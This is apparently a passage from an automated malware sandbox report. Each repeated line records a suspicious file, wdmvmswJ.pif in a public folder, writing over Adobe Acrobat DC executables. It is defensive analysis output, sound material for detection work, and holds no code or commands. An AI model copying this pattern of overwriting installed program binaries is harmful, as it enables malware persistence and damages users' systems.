Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
